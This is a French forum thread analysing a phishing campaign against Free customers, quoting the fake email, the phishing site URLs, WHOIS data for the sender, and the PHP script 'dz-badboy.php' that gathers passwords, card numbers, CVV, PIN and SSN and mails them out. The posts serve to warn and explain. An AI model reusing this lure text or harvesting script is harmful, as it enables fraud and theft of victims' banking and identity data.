Une attaque de phishing classique

Le
Xavier Roche
Hop,

Comme signalé dans FUAD, des attaques de fishing sont en cours contre
des abonnée de FAI français (ici, free)
http://www.astranova.monforum.net/Free.fr/

"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre
compte Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte
Free doit êtremise à jour dans le cadre de notreengagement à protéger
votre compte et à réduire les cas de fraude sur notre site Web. Si vous
pouviez prendre 5-10 minutes s'il vous plaîtRupture de votre expérience
en ligne et de mettre à jour vos dossiers personnels, vous ne
rencontrezl'avenir des problèmes avec le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre
compte Free service ne sera pas interrompuet se poursuivra comme d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le
lien suivant: Cliquez ici
Merci."

Le tout envoyé depuis 41.248.121.125

% Information related to '41.248.64.0 - 41.248.127.255'
inetnum: 41.248.64.0 - 41.248.127.255
netname: PoP-Soekarno-adsl
descr: PoP-Soekarno-adsl
country: MA
admin-c: em1685-AFRINIC
tech-c: OA78-AFRINIC
status: ASSIGNED PA
mnt-by: ONPT-MNT
source: AFRINIC # Filtered
parent: 41.248.0.0 - 41.248.255.255

person: Oumlil Aniss
address: Direction Internet ,division operation Rabat
address: Maroc
phone: +212 37680296
fax-no: +212 37680236
e-mail: oumlil@iam.net.ma
nic-hdl: OA78-AFRINIC
remarks: data has been transferred from RIPE Whois Database 20050221
source: AFRINIC # Filtered

Le site en question (http://www.astranova.monforum.net/Free.fr/) reprend
la CSS de free, et demande un certain nombre d'informations très
confidentielles (nom, adresse, login/pass, données bancaires) -- malgré
le caractère évident de l'attaque pour des internautes un tant soit peu
au fait de ces problèmes, bon nombre de victimes tomberont probablement
dans le panneau.

Ce qui est intéressant, ce n'est pas tellement la technique (qui est
assez basique) mais le fait que l'attaque dure apparamment depuis
plusieurs mois, avec des hébergeurs qui changent régulièrement. Le
dernier en date (http://astramarc.com/Free.fr/) a été rapidement fermé.
Mais entre temps, bon nombre d'internautes crédules tomberont dans le
panneau.

Côté technique, le script apparamment utilisé, "dz-badboy.php", est
d'une simplicité enfantine:

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--ReZulT SpAm--";
$message .= "Email Address : ".$HTTP_COOKIE_VARS['emaill']."";
$message .= "Password :
".$HTTP_COOKIE_VARS['passwordd']."";
$message .= "";
$message .= "First name : ".$_POST['first_name']."";
$message .= "Last name : ".$_POST['last_name']."";
$message .= "Card Type : ".$_POST['credit_card_type']."";
$message .= "Card Number : ".$_POST['ccnumber']."";
$message .= "Expiration Date : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."";
$message .= "Card Verification Number: ".$_POST['cvv2']."";
$message .= "ATM PIN : ".$_POST['PIN']."";
$message .= "Address 1 : ".$_POST['address1']."";
$message .= "Address 2 : ".$_POST['address2']."";
$message .= "City : ".$_POST['city']."";
$message .= "State : ".$_POST['state']."";
$message .= "ZIP Code : ".$_POST['zip']."";
$message .= "Telephone : ".$_POST['H_PhoneNumber']."";
$message .= "Social Security Number : ".$_POST['ssn']."";
$message .= "Date Of Birth : ".$_POST['dob']."";
$message .= "Driver's License : ".$_POST['drl']."";
$message .= "";
$message .= "Security Question 1 : ".$_POST['question1']."";
$message .= "Answer 1 : ".$_POST['answer1']."";
$message .= "Security Question 2 : ".$_POST['question2']."";
$message .= "Answer 2 : ".$_POST['answer2']."";
$message .= "IP : ".$ip."";
$message .= "Created By
JboY";

..

mail($send,$subject,$message,$headers);
?>

Il se contente donc d'envoyer par mail les données (non vérifiées).

A ce niveau, deux remarques:
- le mail est envoyé depuis un dialup (41.248.121.125]) depuis un FAI en
dehors de la zone euro, donc très difficilement traçable
- les sites de phishing envoient probablement les résultats sur la même
adresse ; ce qui permet de créer un site, puis de le laisser mijoter
sans s'en occuper.
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
J. K.
Le #19456031
Bonjour, soir,
Dans son message précédent, Xavier Roche a écrit :

[..]

"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre compte
Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte Free
doit êtremise à jour dans le cadre de notreengagement à protéger votre compte
et à réduire les cas de fraude sur notre site Web. Si vous pouviez prendre
5-10 minutes s'il vous plaîtRupture de votre expérience en ligne et de mettre
à jour vos dossiers personnels, vous ne rencontrezl'avenir des problèmes avec
le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre compte
Free service ne sera pas interrompuet se poursuivra comme d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le lien
suivant: Cliquez ici
Merci."



L'absence d'espace entre certains mots est d'origne ou un problème de
copié/collé ?
Je n'évoque pas les problèmes de grammaire/syntaxe. Pour une fois il y
a des accents de ce message de phishing.
J. K.
Le #19456021
Bonjour, soir,
Dans son message précédent, Xavier Roche a écrit :

[..]


"Cher Client Free :
En raison de préoccupations pour la sécurité et l'intégrité de votre
compte Free compte, nous avons publié ce message d'avertissement.
Il a été porté à notre attention que les informations de votre compte
Free doit êtremise à jour dans le cadre de notreengagement à protéger
votre compte et à réduire les cas de fraude sur notre site Web. Si vous
pouviez prendre 5-10 minutes s'il vous plaîtRupture de votre expérience
en ligne et de mettre à jour vos dossiers personnels, vous ne
rencontrezl'avenir des problèmes avec le service en ligne.
Une fois que vous avez mise à jour de votre compte enregistre votre
compte Free service ne sera pas interrompuet se poursuivra comme
d'habitude.
Pour mettre à jour votre banque en ligne des dossiers, cliquez sur le
lien suivant: Cliquez ici
Merci."

L'absence d'espace entre certains mots est d'origne ou un problème de
copié/collé ?
Je n'évoque pas les problèmes de grammaire/syntaxe. Pour une fois il y
a des accents dans ce message de phishing.
Xavier Roche
Le #19456011
J. K. a écrit :
L'absence d'espace entre certains mots est d'origne ou un problème de
copié/collé ?



Non, c'est bien l'original -- notamment "notreengagement" qui est tel
quel dans le texte.

Je n'évoque pas les problèmes de grammaire/syntaxe. Pour une fois il y a
des accents dans ce message de phishing.



Oui, bel effort :) On va voir en combien de temps ce site tient (a
priori aucune adresse abuse@ ne fonctionne chez ce prestataire)
Publicité
Poster une réponse
Anonyme